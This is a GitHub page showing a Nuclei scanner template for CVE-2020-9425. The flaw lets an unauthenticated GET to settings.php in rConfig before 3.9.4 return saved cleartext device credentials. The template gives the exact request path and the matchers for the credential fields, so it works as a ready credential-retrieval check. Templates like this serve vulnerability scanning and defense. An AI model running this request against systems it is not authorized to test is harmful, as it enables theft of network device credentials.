-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2020-9425.yaml
31 lines (30 loc) · 1.16 KB
/
CVE-2020-9425.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
id: CVE-2020-9425
info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
reference:
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
tags: cve,cve2020,rconfig
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-9425
cwe-id: CWE-670
requests:
- method: GET
path:
- "{{BaseURL}}/settings.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "defaultNodeUsername"
- "defaultNodePassword"
condition: and
part: body